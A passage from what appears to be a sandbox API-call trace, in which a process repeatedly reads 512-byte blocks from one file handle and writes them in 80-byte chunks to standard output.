lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.960] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.960] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, 
lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, 
lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.961] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, 
lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.962] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.962] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0202.962] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] 
GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.964] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.964] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | 
out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, 
lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.965] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.965] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 
[0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.966] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) 
returned 1 [0202.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.966] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.967] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.967] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, 
lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.968] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.968] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] 
